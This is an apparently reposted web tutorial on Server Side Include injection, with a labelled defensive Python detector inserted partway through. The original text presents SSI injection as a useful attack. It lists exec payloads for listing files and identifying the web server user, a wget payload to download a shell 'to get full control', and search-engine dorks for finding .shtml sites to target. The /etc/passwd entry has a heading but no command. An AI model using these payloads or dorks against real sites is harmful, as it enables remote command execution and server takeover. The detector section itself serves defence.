
SSI Injection Explained - Website Security - 自学php

Source: 自学PHP网    Date: 2015-04-17 13:03


1- What is It?
 
A Server Side Include attack is an extremely useful attack for executing commands on the server. You need basic knowledge of Bash or Batch to know which commands could help compromise the server.
 
2- What Sites are Vulnerable?
 
For a site to be vulnerable to SSI Injection, Apache needs Server Side Includes allowed in the config file, or the file extension must end in '.shtml', '.shtm' or '.stm'. Apache, lighttpd and IIS all support SSI.
 
3- Testing for SSI Injection
 
To audit a site for SSI Injection, search all the directories for '.shtml', '.shtm' or '.stm' extensions. If you find any, SSI is probably enabled; if you don't find any, it may still be enabled. It affects pages with unsanitized requests (e.g. no filters filtering <!--#exec … -->). To test, enter the following command into the request:
 
<!--#exec cmd="ls" -->
 
If filesystem output appears, the site is vulnerable. If the server is Windows, replace 'ls' with 'dir'.
You test for SSI the same way as XSS; you can post the command into:
- Textboxes/search boxes
- Headers
- Cookies
- Address Bar
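
The same input locations seen from the defender's side, as an added example that is not part of the original article: a Python check that scans request inputs for SSI directives (including URL-encoded and double-encoded ones) and HTML-encodes a value before it reaches a page the server parses. The function names, field labels and sample request are constructed for illustration.

```python
import html
import re
from urllib.parse import unquote_plus

# SSI directive shape: <!--#element attribute="value" -->.
# Whitespace around '#' is tolerated so sloppy filter-evasion probes are still flagged.
SSI_RE = re.compile(r"<!--\s*#\s*(\w+)(.*?)-->", re.IGNORECASE | re.DOTALL)

def decode(value, rounds=3):
    """Undo URL encoding, repeating to catch double-encoded input."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_ssi(request):
    """Return (input location, directive element) for every SSI directive found."""
    findings = []
    for location, raw in request.items():
        for match in SSI_RE.finditer(decode(raw)):
            findings.append((location, match.group(1).lower()))
    return findings

def neutralize(value):
    """HTML-encode a value before it is written into a page the server parses."""
    return html.escape(value, quote=True)

# Constructed sample request (not real traffic); keys name where the value arrived.
SAMPLE_REQUEST = {
    "query:q": "%3C!--%23exec%20cmd%3D%22ls%22%20--%3E",
    "header:User-Agent": '<!--#exec cmd="whoami" -->',
    "cookie:session": "%253C!--%2523echo%2520var%253D%2522DATE_LOCAL%2522%2520--%253E",
    "header:Referer": "https://example.test/index.shtml",
    "query:note": "<!-- plain HTML comment -->",
}

if __name__ == "__main__":
    for location, element in find_ssi(SAMPLE_REQUEST):
        print(f"SSI directive '{element}' in {location}")
    print(neutralize(SAMPLE_REQUEST["header:User-Agent"]))
```

Input filtering is only one layer; on Apache, `Options IncludesNOEXEC` keeps SSI available while disabling the exec directive.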
 
4- Useful Commands
 
-Show Files Linux
 
<!--#exec cmd="ls" -->
 
-Show Files Windows
 
<!--#exec cmd="dir" -->
 
-Read /etc/passwd
 
 
 
-What User Is the webserver running on
 
<!--#exec cmd="whoami" -->
 
-Download a shell to the server to get full control
 
<!--#exec cmd="wget "shell.php"" -->
 
5- Dorks
 
Similar to SQLi dorks, these return a list of sites that may or may not be vulnerable to SSI Injection:
inurl:index.shtml
inurl:index.shtm
inurl:index.stm
There are a few to start you off, but it is easy as pie to think of your own.

Excerpted from http://hi.baidu.com/evilrapper/blog/item/743d884e13a465d4d0c86a76.html
